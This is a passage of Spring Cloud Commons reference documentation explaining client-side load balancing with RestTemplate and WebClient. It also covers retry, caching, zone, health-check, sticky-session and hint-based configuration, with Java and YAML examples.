You can disable this behavior by setting the value of `spring.cloud.loadbalancer.retry.avoidPreviousInstance` to `false`.\n\n====\n[source,java,indent=0]\n----\n@Configuration\npublic class MyConfiguration {\n @Bean\n LoadBalancedRetryFactory retryFactory() {\n return new LoadBalancedRetryFactory() {\n @Override\n public BackOffPolicy createBackOffPolicy(String service) {\n \t\treturn new ExponentialBackOffPolicy();\n \t}\n };\n }\n}\n----\n====\n\nIf you want to add one or more `RetryListener` implementations to your retry functionality, you need to\ncreate a bean of type `LoadBalancedRetryListenerFactory` and return the `RetryListener` array\nyou would like to use for a given service, as the following example shows:\n\n====\n[source,java,indent=0]\n----\n@Configuration\npublic class MyConfiguration {\n @Bean\n LoadBalancedRetryListenerFactory retryListenerFactory() {\n return new LoadBalancedRetryListenerFactory() {\n @Override\n public RetryListener[] createRetryListeners(String service) {\n return new RetryListener[]{new RetryListener() {\n @Override\n public <T, E extends Throwable> boolean open(RetryContext context, RetryCallback<T, E> callback) {\n \/\/TODO Do you business...\n return true;\n }\n\n @Override\n public <T, E extends Throwable> void close(RetryContext context, RetryCallback<T, E> callback, Throwable throwable) {\n \/\/TODO Do you business...\n }\n\n @Override\n public <T, E extends Throwable> void onError(RetryContext context, RetryCallback<T, E> callback, Throwable throwable) {\n \/\/TODO Do you business...\n }\n }};\n }\n };\n }\n}\n----\n====\n\n=== Multiple `RestTemplate` Objects\n\nIf you want a `RestTemplate` that is not load-balanced, create a `RestTemplate` bean and inject it.\nTo access the load-balanced `RestTemplate`, use the `@LoadBalanced` qualifier when you create your `@Bean`, as the following example shows:\n\n====\n[source,java,indent=0]\n----\n@Configuration\npublic class MyConfiguration {\n\n @LoadBalanced\n @Bean\n RestTemplate loadBalanced() {\n return new RestTemplate();\n }\n\n @Primary\n @Bean\n RestTemplate restTemplate() {\n return new RestTemplate();\n }\n}\n\npublic class MyClass {\n@Autowired\nprivate RestTemplate restTemplate;\n\n @Autowired\n @LoadBalanced\n private RestTemplate loadBalanced;\n\n public String doOtherStuff() {\n return loadBalanced.getForObject(\"http:\/\/stores\/stores\", String.class);\n }\n\n public String doStuff() {\n return restTemplate.getForObject(\"http:\/\/example.com\", String.class);\n }\n}\n----\n====\n\nIMPORTANT: Notice the use of the `@Primary` annotation on the plain `RestTemplate` declaration in the preceding example to disambiguate the unqualified `@Autowired` injection.\n\nTIP: If you see errors such as `java.lang.IllegalArgumentException: Can not set org.springframework.web.client.RestTemplate field com.my.app.Foo.restTemplate to com.sun.proxy.$Proxy89`, try injecting `RestOperations` or setting `spring.aop.proxyTargetClass=true`.\n\n=== Multiple WebClient Objects\n\nIf you want a `WebClient` that is not load-balanced, create a `WebClient` bean and inject it.\nTo access the load-balanced `WebClient`, use the `@LoadBalanced` qualifier when you create your `@Bean`, as the following example shows:\n\n====\n[source,java,indent=0]\n----\n@Configuration\npublic class MyConfiguration {\n\n @LoadBalanced\n @Bean\n WebClient.Builder loadBalanced() {\n return WebClient.builder();\n }\n\n @Primary\n @Bean\n WebClient.Builder webClient() {\n return WebClient.builder();\n }\n}\n\npublic class MyClass {\n 
@Autowired\n private WebClient.Builder webClientBuilder;\n\n @Autowired\n @LoadBalanced\n private WebClient.Builder loadBalanced;\n\n public Mono<String> doOtherStuff() {\n return loadBalanced.build().get().uri(\"http:\/\/stores\/stores\")\n \t\t\t\t.retrieve().bodyToMono(String.class);\n }\n\n public Mono<String> doStuff() {\n return webClientBuilder.build().get().uri(\"http:\/\/example.com\")\n \t\t\t\t.retrieve().bodyToMono(String.class);\n }\n}\n----\n====\n\n[[loadbalanced-webclient]]\n=== Spring WebFlux `WebClient` as a Load Balancer Client\n\nSpring WebFlux can work with both reactive and non-reactive `WebClient` configurations, as the following topics describe:\n\n* <<webflux-with-reactive-loadbalancer>>\n* <<load-balancer-exchange-filter-function>>\n\n[[webflux-with-reactive-loadbalancer]]\n==== Spring WebFlux `WebClient` with `ReactorLoadBalancerExchangeFilterFunction`\n\nYou can configure `WebClient` to use the `ReactiveLoadBalancer`.\nIf you add the <<spring-cloud-loadbalancer-starter, Spring Cloud LoadBalancer starter>> to your project\nand if `spring-webflux` is on the classpath, `ReactorLoadBalancerExchangeFilterFunction` is auto-configured.\nThe following example shows how to configure a `WebClient` to use the reactive load-balancer:\n\n====\n[source,java,indent=0]\n----\npublic class MyClass {\n @Autowired\n private ReactorLoadBalancerExchangeFilterFunction lbFunction;\n\n public Mono<String> doOtherStuff() {\n return WebClient.builder().baseUrl(\"http:\/\/stores\")\n .filter(lbFunction)\n .build()\n .get()\n .uri(\"\/stores\")\n .retrieve()\n .bodyToMono(String.class);\n }\n}\n----\n====\n\nThe URI needs to use a virtual host name (that is, a service name, not a host name).\nThe `ReactorLoadBalancer` is used to create a full physical address.\n\n[[load-balancer-exchange-filter-function]]\n==== Spring WebFlux `WebClient` with a Non-reactive Load Balancer Client\n\nIf `spring-webflux` is on the classpath, `LoadBalancerExchangeFilterFunction`\nis auto-configured.
Note, however, that this\nuses a non-reactive client under the hood.\nThe following example shows how to configure a `WebClient` to use a load balancer:\n\n====\n[source,java,indent=0]\n----\npublic class MyClass {\n @Autowired\n private LoadBalancerExchangeFilterFunction lbFunction;\n\n public Mono<String> doOtherStuff() {\n return WebClient.builder().baseUrl(\"http:\/\/stores\")\n .filter(lbFunction)\n .build()\n .get()\n .uri(\"\/stores\")\n .retrieve()\n .bodyToMono(String.class);\n }\n}\n----\n====\n\nThe URI needs to use a virtual host name (that is, a service name, not a host name).\nThe `LoadBalancerClient` is used to create a full physical address.\n\nWARNING: This approach is now deprecated.\nWe suggest that you use <<webflux-with-reactive-loadbalancer,WebFlux with reactive Load-Balancer>>\ninstead.\n\n[[ignore-network-interfaces]]\n=== Ignore Network Interfaces\n\nSometimes, it is useful to ignore certain named network interfaces so that they can be excluded from Service Discovery registration (for example, when running in a Docker container).\nA list of regular expressions can be set to cause the desired network interfaces to be ignored.\nThe following configuration ignores the `docker0` interface and all interfaces that start with `veth`:\n\n.application.yml\n====\n----\nspring:\n  cloud:\n    inetutils:\n      ignoredInterfaces:\n        - docker0\n        - veth.*\n----\n====\n\nYou can also force the use of only specified network addresses by using a list of regular expressions, as the following example shows:\n\n.bootstrap.yml\n====\n----\nspring:\n  cloud:\n    inetutils:\n      preferredNetworks:\n        - 192.168\n        - 10.0\n----\n====\n\nYou can also force the use of only site-local addresses, as the following example shows:\n\n.application.yml\n====\n----\nspring:\n  cloud:\n    inetutils:\n      useOnlySiteLocalInterfaces: true\n----\n====\n\nSee https:\/\/docs.oracle.com\/javase\/8\/docs\/api\/java\/net\/Inet4Address.html#isSiteLocalAddress--[Inet4Address.isSiteLocalAddress()] for more details about what constitutes a site-local address.\n\n[[http-clients]]\n=== HTTP Client Factories\n\nSpring Cloud Commons provides beans for creating both Apache HTTP clients (`ApacheHttpClientFactory`) and OK HTTP clients (`OkHttpClientFactory`).\nThe `OkHttpClientFactory` bean is created only if the OK HTTP jar is on the classpath.\nIn addition, Spring Cloud Commons provides beans for creating the connection managers used by both clients: `ApacheHttpClientConnectionManagerFactory` for the Apache HTTP client and `OkHttpClientConnectionPoolFactory` for the OK HTTP client.\nIf you would like to customize how the HTTP clients are created in downstream projects, you can provide your own implementation of these beans.\nIn addition, if you provide a bean of type `HttpClientBuilder` or `OkHttpClient.Builder`, the default factories use these builders as the basis for the builders returned to downstream projects.\nYou can also disable the creation of these beans by setting `spring.cloud.httpclientfactories.apache.enabled` or `spring.cloud.httpclientfactories.ok.enabled` to `false`.\n\n[[enabled-features]]\n=== Enabled Features\n\nSpring Cloud Commons provides a `\/features` actuator endpoint.\nThis endpoint returns features available on the classpath and whether they are enabled.\nThe information returned includes the feature type, name, version, and vendor.\n\n==== Feature types\n\nThere are two types of 'features': abstract and named.\n\nAbstract features are features where an interface or abstract class is defined and that an
implementation creates, such as `DiscoveryClient`, `LoadBalancerClient`, or `LockService`.\nThe abstract class or interface is used to find a bean of that type in the context.\nThe version displayed is `bean.getClass().getPackage().getImplementationVersion()`.\n\nNamed features are features that do not have a particular class they implement. These features include \"`Circuit Breaker`\", \"`API Gateway`\", \"`Spring Cloud Bus`\", and others. These features require a name and a bean type.\n\n==== Declaring features\n\nAny module can declare any number of `HasFeatures` beans, as the following examples show:\n\n====\n[source,java,indent=0]\n----\n@Bean\npublic HasFeatures commonsFeatures() {\n return HasFeatures.abstractFeatures(DiscoveryClient.class, LoadBalancerClient.class);\n}\n\n@Bean\npublic HasFeatures consulFeatures() {\n return HasFeatures.namedFeatures(\n new NamedFeature(\"Spring Cloud Bus\", ConsulBusAutoConfiguration.class),\n new NamedFeature(\"Circuit Breaker\", HystrixCommandAspect.class));\n}\n\n@Bean\nHasFeatures localFeatures() {\n return HasFeatures.builder()\n .abstractFeature(Something.class)\n .namedFeature(new NamedFeature(\"Some Other Feature\", Someother.class))\n .abstractFeature(Somethingelse.class)\n .build();\n}\n----\n====\n\nEach of these beans should go in an appropriately guarded `@Configuration`.\n\n\n=== Spring Cloud Compatibility Verification\n\nBecause some users have problems with setting up Spring Cloud applications, we decided\nto add a compatibility verification mechanism. It breaks your application's startup if your current setup is not compatible\nwith Spring Cloud requirements and produces a report showing what exactly went wrong.\n\nAt the moment, we verify which version of Spring Boot is added to your classpath.\n\nThe following example shows such a report:\n\n====\n----\n***************************\nAPPLICATION FAILED TO START\n***************************\n\nDescription:\n\nYour project setup is incompatible with our requirements due to following reasons:\n\n- Spring Boot [2.1.0.RELEASE] is not compatible with this Spring Cloud release train\n\n\nAction:\n\nConsider applying the following actions:\n\n- Change Spring Boot version to one of the following versions [1.2.x, 1.3.x] .\nYou can find the latest Spring Boot versions here [https:\/\/spring.io\/projects\/spring-boot#learn].\nIf you want to learn more about the Spring Cloud Release train compatibility, you can visit this page [https:\/\/spring.io\/projects\/spring-cloud#overview] and check the [Release Trains] section.\n----\n====\n\nIn order to disable this feature, set `spring.cloud.compatibility-verifier.enabled` to `false`.\nIf you want to override the compatible Spring Boot versions, just set the\n`spring.cloud.compatibility-verifier.compatible-boot-versions` property with a comma-separated list\nof compatible Spring Boot versions.\n\n== Spring Cloud LoadBalancer\n\nSpring Cloud provides its own client-side load-balancer abstraction and implementation. For the load-balancing\nmechanism, the `ReactiveLoadBalancer` interface has been added, and *Round-Robin-based* and *Random* implementations\nhave been provided for it. In order to get instances to select from, a reactive `ServiceInstanceListSupplier`\nis used.
Currently, we support a service-discovery-based implementation of `ServiceInstanceListSupplier`\nthat retrieves available instances from Service Discovery using a <<discovery-client, Discovery Client>> available in the classpath.\n\nTIP: It is possible to disable Spring Cloud LoadBalancer by setting the value of `spring.cloud.loadbalancer.enabled` to `false`.\n\n=== Switching between the load-balancing algorithms\n\nThe `ReactiveLoadBalancer` implementation that is used by default is `RoundRobinLoadBalancer`. To switch to a different implementation, either for selected services or all of them, you can use the <<custom-loadbalancer-configuration, custom LoadBalancer configurations mechanism>>.\n\nFor example, the following configuration can be passed via the `@LoadBalancerClient` annotation to switch to using the `RandomLoadBalancer`:\n\n[[random-loadbalancer-configuration]]\n[source,java,indent=0]\n----\npublic class CustomLoadBalancerConfiguration {\n\n\t@Bean\n\tReactorLoadBalancer<ServiceInstance> randomLoadBalancer(Environment environment,\n\t\t\tLoadBalancerClientFactory loadBalancerClientFactory) {\n\t\tString name = environment.getProperty(LoadBalancerClientFactory.PROPERTY_NAME);\n\t\treturn new RandomLoadBalancer(loadBalancerClientFactory\n\t\t\t\t.getLazyProvider(name, ServiceInstanceListSupplier.class),\n\t\t\t\tname);\n\t}\n}\n----\n\nNOTE: The classes you pass as `@LoadBalancerClient` or `@LoadBalancerClients` configuration arguments should either not be annotated with `@Configuration` or be outside component scan scope.\n\n=== Spring Cloud LoadBalancer integrations\n\nIn order to make it easy to use Spring Cloud LoadBalancer, we provide `ReactorLoadBalancerExchangeFilterFunction`, which can be used with `WebClient`, and `BlockingLoadBalancerClient`, which works with `RestTemplate`.\nYou can see more information and examples of usage in the following sections:\n\n* <<rest-template-loadbalancer-client,Spring RestTemplate as a Load Balancer Client>>\n* <<webclinet-loadbalancer-client, Spring WebClient as a Load Balancer Client>>\n* <<webflux-with-reactive-loadbalancer,Spring WebFlux WebClient with `ReactorLoadBalancerExchangeFilterFunction`>>\n\n[[loadbalancer-caching]]\n=== Spring Cloud LoadBalancer Caching\n\nApart from the basic `ServiceInstanceListSupplier` implementation that retrieves instances via `DiscoveryClient` each time it has to choose an instance, we provide two caching implementations.\n\n==== https:\/\/github.com\/ben-manes\/caffeine[Caffeine]-backed LoadBalancer Cache Implementation\n\nIf you have `com.github.ben-manes.caffeine:caffeine` in the classpath, the Caffeine-based implementation will be used.\nSee the <<loadbalancer-cache-configuration, LoadBalancerCacheConfiguration>> section for information on how to configure it.\n\nIf you are using Caffeine, you can also override the default Caffeine Cache setup for the LoadBalancer by passing your own https:\/\/static.javadoc.io\/com.github.ben-manes.caffeine\/caffeine\/2.2.2\/com\/github\/benmanes\/caffeine\/cache\/CaffeineSpec.html[Caffeine Specification]\nin the `spring.cloud.loadbalancer.cache.caffeine.spec` property.\n\nWARNING: Passing your own Caffeine specification will override any other LoadBalancerCache settings, including <<loadbalancer-cache-configuration, General LoadBalancer Cache Configuration>> fields, such as `ttl` and `capacity`.\n\n==== Default LoadBalancer Cache Implementation\n\nIf you do not have Caffeine in the classpath, the `DefaultLoadBalancerCache`, which comes automatically with
`spring-cloud-starter-loadbalancer`, will be used.\nSee the <<loadbalancer-cache-configuration, LoadBalancerCacheConfiguration>> section for information on how to configure it.\n\nTIP: To use Caffeine instead of the default cache, add the `com.github.ben-manes.caffeine:caffeine` dependency to the classpath.\n\n[[loadbalancer-cache-configuration]]\n==== LoadBalancer Cache Configuration\n\nYou can set your own `ttl` value (the time after write after which entries should be expired), expressed as `Duration`, by passing a `String` compliant with the https:\/\/docs.spring.io\/spring-boot\/docs\/current\/reference\/html\/spring-boot-features.html#boot-features-external-config-conversion-duration[Spring Boot `String` to `Duration` converter syntax]\nas the value of the `spring.cloud.loadbalancer.cache.ttl` property.\nYou can also set your own LoadBalancer cache initial capacity by setting the value of the `spring.cloud.loadbalancer.cache.capacity` property.\n\nThe default setup sets `ttl` to 35 seconds, and the default `initialCapacity` is `256`.\n\nYou can also disable LoadBalancer caching altogether by setting the value of `spring.cloud.loadbalancer.cache.enabled`\nto `false`.\n\nWARNING: Although the basic, non-cached, implementation is useful for prototyping and testing, it's much less efficient than the cached versions, so we recommend always using the cached version in production. If the caching is already done by the `DiscoveryClient` implementation, for example `EurekaDiscoveryClient`, the load-balancer caching should be disabled to prevent double caching.\n\n=== Zone-Based Load-Balancing\n\nTo enable zone-based load-balancing, we provide the `ZonePreferenceServiceInstanceListSupplier`.\nWe use `DiscoveryClient`-specific `zone` configuration (for example, `eureka.instance.metadata-map.zone`) to pick the zone for which the client tries to filter available service instances.\n\nNOTE: You can also override the `DiscoveryClient`-specific zone setup by setting the value of the `spring.cloud.loadbalancer.zone` property.\n\nWARNING: For the time being, only the Eureka Discovery Client is instrumented to set the LoadBalancer zone. For other discovery clients, set the `spring.cloud.loadbalancer.zone` property.
More instrumentations are coming shortly.\n\nNOTE: To determine the zone of a retrieved `ServiceInstance`, we check the value under the `\"zone\"` key in its metadata map.\n\nThe `ZonePreferenceServiceInstanceListSupplier` filters retrieved instances and only returns the ones within the same zone.\nIf the zone is `null` or there are no instances within the same zone, it returns all the retrieved instances.\n\nIn order to use the zone-based load-balancing approach, you will have to instantiate a `ZonePreferenceServiceInstanceListSupplier` bean in a <<custom-loadbalancer-configuration,custom configuration>>.\n\nWe use delegates to work with `ServiceInstanceListSupplier` beans.\nWe suggest passing a `DiscoveryClientServiceInstanceListSupplier` delegate in the constructor of `ZonePreferenceServiceInstanceListSupplier` and, in turn, wrapping the latter with a `CachingServiceInstanceListSupplier` to leverage the <<loadbalancer-caching, LoadBalancer caching mechanism>>.\n\nYou could use this sample configuration to set it up:\n\n[[zoned-based-custom-loadbalancer-configuration]]\n[source,java,indent=0]\n----\npublic class CustomLoadBalancerConfiguration {\n\n\t@Bean\n\tpublic ServiceInstanceListSupplier discoveryClientServiceInstanceListSupplier(\n\t\t\tConfigurableApplicationContext context) {\n\t\treturn ServiceInstanceListSupplier.builder()\n\t\t\t\t\t.withDiscoveryClient()\n\t\t\t\t\t.withZonePreference()\n\t\t\t\t\t.withCaching()\n\t\t\t\t\t.build(context);\n\t}\n}\n----\n\n=== Instance Health-Check for LoadBalancer\n\nIt is possible to enable a scheduled HealthCheck for the LoadBalancer. The `HealthCheckServiceInstanceListSupplier`\nis provided for that. It regularly verifies if the instances provided by a delegate\n`ServiceInstanceListSupplier` are still alive and only returns the healthy instances,\nunless there are none - then it returns all the retrieved instances.\n\nTIP: This mechanism is particularly helpful while using the `SimpleDiscoveryClient`. For the\nclients backed by an actual Service Registry, it's not necessary to use it, as we already get\nhealthy instances after querying the external Service Discovery.\n\nTIP: This supplier is also recommended for setups with a small number of instances per service\nin order to avoid retrying calls on a failing instance.\n\nWARNING: If using any of the Service Discovery-backed suppliers, adding this health-check mechanism is usually not necessary, as we retrieve the health state of the instances directly\nfrom the Service Registry.\n\nTIP: The `HealthCheckServiceInstanceListSupplier` relies on having updated instances provided by a delegate flux. In the rare cases when you want to use a delegate that does not refresh the instances, even though the list of instances may change (such as the `ReactiveDiscoveryClientServiceInstanceListSupplier` provided by us), you can set `spring.cloud.loadbalancer.health-check.refetch-instances` to `true` to have the instance list refreshed by the `HealthCheckServiceInstanceListSupplier`. You can then also adjust the refetch intervals by modifying the value of `spring.cloud.loadbalancer.health-check.refetch-instances-interval` and opt to disable the additional healthcheck repetitions by setting `spring.cloud.loadbalancer.repeat-health-check` to `false`, as every instance refetch\nwill also trigger a healthcheck.\n\n`HealthCheckServiceInstanceListSupplier` uses properties prefixed with\n`spring.cloud.loadbalancer.health-check`. You can set the `initialDelay` and `interval`\nfor the scheduler.
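\n\nFor instance, a minimal `application.yml` sketch (the values are illustrative, and the relaxed-binding property names `initial-delay` and `interval` are assumed to map to the `initialDelay` and `interval` settings mentioned above) might look like this:\n\n.application.yml\n====\n----\nspring:\n  cloud:\n    loadbalancer:\n      health-check:\n        initial-delay: 1s\n        interval: 25s\n----\n====\n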
You can set the default path for the healthcheck URL by setting\nthe value of the `spring.cloud.loadbalancer.health-check.path.default` property. You can also set a specific value for any given service by setting the value of the `spring.cloud.loadbalancer.health-check.path.[SERVICE_ID]` property, substituting `[SERVICE_ID]` with the correct ID of your service. If the path is not set, `\/actuator\/health` is used by default.\n\nTIP: If you rely on the default path (`\/actuator\/health`), make sure you add `spring-boot-starter-actuator` to your collaborator's dependencies, unless you are planning to add such an endpoint on your own.\n\nIn order to use the health-check scheduler approach, you will have to instantiate a `HealthCheckServiceInstanceListSupplier` bean in a <<custom-loadbalancer-configuration,custom configuration>>.\n\nWe use delegates to work with `ServiceInstanceListSupplier` beans.\nWe suggest passing a `DiscoveryClientServiceInstanceListSupplier` delegate in the constructor of `HealthCheckServiceInstanceListSupplier`.\n\nYou could use this sample configuration to set it up:\n\n[[health-check-based-custom-loadbalancer-configuration]]\n[source,java,indent=0]\n----\npublic class CustomLoadBalancerConfiguration {\n\n\t@Bean\n\tpublic ServiceInstanceListSupplier discoveryClientServiceInstanceListSupplier(\n\t\t\tConfigurableApplicationContext context) {\n\t\treturn ServiceInstanceListSupplier.builder()\n\t\t\t\t\t.withDiscoveryClient()\n\t\t\t\t\t.withHealthChecks()\n\t\t\t\t\t.build(context);\n\t}\n}\n----\n\nTIP: For the non-reactive stack, create this supplier with the `withBlockingHealthChecks()` method.\nYou can also pass your own `WebClient` or `RestTemplate` instance to be used for the checks.\n\nWARNING: `HealthCheckServiceInstanceListSupplier` has its own caching mechanism based on Reactor Flux `replay()`. Therefore, if it's being used, you may want to skip wrapping that supplier with `CachingServiceInstanceListSupplier`.\n\n=== Same instance preference for LoadBalancer\n\nYou can set up the LoadBalancer in such a way that it prefers the instance that was previously selected, if that instance is available.\n\nFor that, you need to use `SameInstancePreferenceServiceInstanceListSupplier`. You can configure it either by setting the value of `spring.cloud.loadbalancer.configurations` to `same-instance-preference` or by providing your own `ServiceInstanceListSupplier` bean -- for example:\n\n[source,java,indent=0]\n----\npublic class CustomLoadBalancerConfiguration {\n\n\t@Bean\n\tpublic ServiceInstanceListSupplier discoveryClientServiceInstanceListSupplier(\n\t\t\tConfigurableApplicationContext context) {\n\t\treturn ServiceInstanceListSupplier.builder()\n\t\t\t\t\t.withDiscoveryClient()\n\t\t\t\t\t.withSameInstancePreference()\n\t\t\t\t\t.build(context);\n\t}\n}\n----\n\nTIP: This is also a replacement for Zookeeper `StickyRule`.\n\n=== Request-based Sticky Session for LoadBalancer\n\nYou can set up the LoadBalancer in such a way that it prefers the instance with the `instanceId` provided in a request cookie. We currently support this if the request is being passed to the LoadBalancer through either `ClientRequestContext` or `ServerHttpRequestContext`, which are used by the SC LoadBalancer exchange filter functions and filters.\n\nFor that, you need to use the `RequestBasedStickySessionServiceInstanceListSupplier`.
You can configure it either by setting the value of `spring.cloud.loadbalancer.configurations` to `request-based-sticky-session` or by providing your own `ServiceInstanceListSupplier` bean -- for example:\n\n[[request-based-sticky-session-custom-loadbalancer-configuration]]\n[source,java,indent=0]\n----\npublic class CustomLoadBalancerConfiguration {\n\n\t@Bean\n\tpublic ServiceInstanceListSupplier discoveryClientServiceInstanceListSupplier(\n\t\t\tConfigurableApplicationContext context) {\n\t\treturn ServiceInstanceListSupplier.builder()\n\t\t\t\t\t.withDiscoveryClient()\n\t\t\t\t\t.withRequestBasedStickySession()\n\t\t\t\t\t.build(context);\n\t}\n}\n----\n\nFor that functionality, it is useful to have the selected service instance (which can be different from the one in the original request cookie if that one is not available) updated before sending the request forward. To do that, set the value of `spring.cloud.loadbalancer.sticky-session.add-service-instance-cookie` to `true`.\n\nBy default, the name of the cookie is `sc-lb-instance-id`. You can modify it by changing the value of the `spring.cloud.loadbalancer.instance-id-cookie-name` property.\n\nNOTE: This feature is currently supported for WebClient-backed load-balancing.\n\n[[spring-cloud-loadbalancer-hints]]\n=== Spring Cloud LoadBalancer Hints\n\nSpring Cloud LoadBalancer lets you set `String` hints that are passed to the LoadBalancer within the `Request` object and that can later be used in `ReactiveLoadBalancer` implementations that can handle them.\n\nYou can set a default hint for all services by setting the value of the `spring.cloud.loadbalancer.hint.default` property. You can also set a specific value\nfor any given service by setting the value of the `spring.cloud.loadbalancer.hint.[SERVICE_ID]` property, substituting `[SERVICE_ID]` with the correct ID of your service. If the hint is not set by the user, `default` is used.\n\n[[hints-based-loadbalancing]]\n=== Hint-Based Load-Balancing\n\nWe also provide a `HintBasedServiceInstanceListSupplier`, which is a `ServiceInstanceListSupplier` implementation for hint-based instance selection.\n\n`HintBasedServiceInstanceListSupplier` checks for a hint request header (the default header name is `X-SC-LB-Hint`, but you can modify it by changing the value of the `spring.cloud.loadbalancer.hint-header-name` property) and, if it finds a hint request header, uses the hint value passed in the header to filter service instances.\n\nIf no hint header has been added, `HintBasedServiceInstanceListSupplier` uses <<spring-cloud-loadbalancer-hints,hint values from properties>> to filter service instances.\n\nIf no hint is set, either by the header or by properties, all service instances provided by the delegate are returned.\n\nWhile filtering, `HintBasedServiceInstanceListSupplier` looks for service instances that have a matching value set under the `hint` key in their `metadataMap`.
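\n\nAs an illustration only (this sketch assumes the default `X-SC-LB-Hint` header name, reuses the auto-configured `ReactorLoadBalancerExchangeFilterFunction` described earlier, and uses a made-up hint value of `test`), a client could pass a hint with a request along these lines:\n\n[source,java,indent=0]\n----\npublic class MyClass {\n\n\t@Autowired\n\tprivate ReactorLoadBalancerExchangeFilterFunction lbFunction;\n\n\tpublic Mono<String> doOtherStuff() {\n\t\treturn WebClient.builder().baseUrl(\"http:\/\/stores\")\n\t\t\t\t.filter(lbFunction)\n\t\t\t\t.build()\n\t\t\t\t.get()\n\t\t\t\t.uri(\"\/stores\")\n\t\t\t\t\/\/ only instances with a matching value under the `hint` key in their\n\t\t\t\t\/\/ metadataMap are kept; all are returned if none match\n\t\t\t\t.header(\"X-SC-LB-Hint\", \"test\")\n\t\t\t\t.retrieve()\n\t\t\t\t.bodyToMono(String.class);\n\t}\n}\n----\n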
If no matching instances are found, all instances provided by the delegate are returned.\n\nYou could use the following sample configuration to set it up:\n\n[[hints-based-custom-loadbalancer-configuration]]\n[source,java,indent=0]\n----\npublic class CustomLoadBalancerConfiguration {\n\n\t@Bean\n\tpublic ServiceInstanceListSupplier discoveryClientServiceInstanceListSupplier(\n\t\t\tConfigurableApplicationContext context) {\n\t\treturn ServiceInstanceListSupplier.builder()\n\t\t\t\t\t.withDiscoveryClient()\n\t\t\t\t\t.withHints()\n\t\t\t\t\t.withCaching()\n\t\t\t\t\t.build(context);\n\t}\n}\n----\n\n=== Transform the load-balanced HTTP request\n\nYou can use the selected `ServiceInstance` to transform the load-balanced HTTP request.\n\nFor `RestTemplate`, you need to implement and define `LoadBalancerRequestTransformer` as follows:\n\n[source,java,indent=0]\n----\n\t@Bean\n\tpublic LoadBalancerRequestTransformer transformer() {\n\t\treturn new LoadBalancerRequestTransformer() {\n\t\t\t@Override\n\t\t\tpublic HttpRequest transformRequest(HttpRequest request, ServiceInstance instance) {\n\t\t\t\treturn new HttpRequestWrapper(request) {\n\t\t\t\t\t@Override\n\t\t\t\t\tpublic HttpHeaders getHeaders() {\n\t\t\t\t\t\tHttpHeaders headers = new HttpHeaders();\n\t\t\t\t\t\theaders.putAll(super.getHeaders());\n\t\t\t\t\t\theaders.add(\"X-InstanceId\", instance.getInstanceId());\n\t\t\t\t\t\treturn headers;\n\t\t\t\t\t}\n\t\t\t\t};\n\t\t\t}\n\t\t};\n\t}\n----\n\nFor `WebClient`, you need to implement and define `LoadBalancerClientRequestTransformer` as follows:\n\n[source,java,indent=0]\n----\n\t@Bean\n\tpublic LoadBalancerClientRequestTransformer transformer() {\n\t\treturn new LoadBalancerClientRequestTransformer() {\n\t\t\t@Override\n\t\t\tpublic ClientRequest transformRequest(ClientRequest request, ServiceInstance instance) {\n\t\t\t\treturn ClientRequest.from(request)\n\t\t\t\t\t\t.header(\"X-InstanceId\", instance.getInstanceId())\n\t\t\t\t\t\t.build();\n\t\t\t}\n\t\t};\n\t}\n----\n\nIf multiple transformers are defined, they are applied in the order in which the beans are defined.\nAlternatively, you can use `LoadBalancerRequestTransformer.DEFAULT_ORDER` or `LoadBalancerClientRequestTransformer.DEFAULT_ORDER` to specify the order.\n\n[[spring-cloud-loadbalancer-starter]]\n=== Spring Cloud LoadBalancer Starter\n\nWe also provide a starter that allows you to easily add Spring Cloud LoadBalancer to a Spring Boot app.\nIn order to use it, just add `org.springframework.cloud:spring-cloud-starter-loadbalancer` to your Spring Cloud dependencies in your build file.\n\nNOTE: The Spring Cloud LoadBalancer starter includes\nhttps:\/\/docs.spring.io\/spring-boot\/docs\/current\/reference\/html\/boot-features-caching.html[Spring Boot Caching]\nand https:\/\/github.com\/stoyanr\/Evictor[Evictor].\n\n[[custom-loadbalancer-configuration]]\n=== Passing Your Own Spring Cloud LoadBalancer Configuration\n\nYou can also use the `@LoadBalancerClient` annotation to pass your own load-balancer client configuration, passing the name of the load-balancer client and the configuration class, as follows:\n\n====\n[source,java,indent=0]\n----\n@Configuration\n@LoadBalancerClient(value = \"stores\", configuration = CustomLoadBalancerConfiguration.class)\npublic class MyConfiguration {\n\n\t@Bean\n\t@LoadBalanced\n\tpublic WebClient.Builder loadBalancedWebClientBuilder() {\n\t\treturn WebClient.builder();\n\t}\n}\n----\n\nTIP: In order to make working on your own LoadBalancer configuration easier, we have added a `builder()` method
to the `ServiceInstanceListSupplier` class.\n\nTIP: You can also use our alternative predefined configurations in place of the default ones by setting the value of the `spring.cloud.loadbalancer.configurations` property to `zone-preference` to use `ZonePreferenceServiceInstanceListSupplier` with caching or to `health-check` to use `HealthCheckServiceInstanceListSupplier` with caching.\n====\n\nYou can use this feature to instantiate different implementations of `ServiceInstanceListSupplier` or `ReactorLoadBalancer`, either written by you or provided by us as alternatives (for example, `ZonePreferenceServiceInstanceListSupplier`), to override the default setup.\n\nYou can see an example of a custom configuration <<zoned-based-custom-loadbalancer-configuration,here>>.\n\nNOTE: The annotation `value` argument (`stores` in the example above) specifies the service ID of the service to which we should send the requests with the given custom configuration.\n\nYou can also pass multiple configurations (for more than one load-balancer client) through the `@LoadBalancerClients` annotation, as the following example shows:\n\n====\n[source,java,indent=0]\n----\n@Configuration\n@LoadBalancerClients({@LoadBalancerClient(value = \"stores\", configuration = StoresLoadBalancerClientConfiguration.class), @LoadBalancerClient(value = \"customers\", configuration = CustomersLoadBalancerClientConfiguration.class)})\npublic class MyConfiguration {\n\n\t@Bean\n\t@LoadBalanced\n\tpublic WebClient.Builder loadBalancedWebClientBuilder() {\n\t\treturn WebClient.builder();\n\t}\n}\n----\n\nNOTE: The classes you pass as `@LoadBalancerClient` or `@LoadBalancerClients` configuration arguments should either not be annotated with `@Configuration` or be outside component scan scope.\n\n====\n\n[[loadbalancer-lifecycle]]\n=== Spring Cloud LoadBalancer Lifecycle\n\nOne type of bean that it may be useful to register using <<custom-loadbalancer-configuration,Custom LoadBalancer configuration>> is `LoadBalancerLifecycle`.\n\nThe `LoadBalancerLifecycle` beans provide callback methods, named `onStart(Request<RC> request)`, `onStartRequest(Request<RC> request, Response<T> lbResponse)` and `onComplete(CompletionContext<RES, T, RC> completionContext)`, that you should implement to specify what actions should take place before and after load-balancing.\n\n`onStart(Request<RC> request)` takes a `Request` object as a parameter. It contains data that is used to select an appropriate instance, including the downstream client request and <<spring-cloud-loadbalancer-hints,hint>>. `onStartRequest` also takes the `Request` object and, additionally, the `Response<T>` object as parameters. On the other hand, a `CompletionContext` object is provided to the `onComplete(CompletionContext<RES, 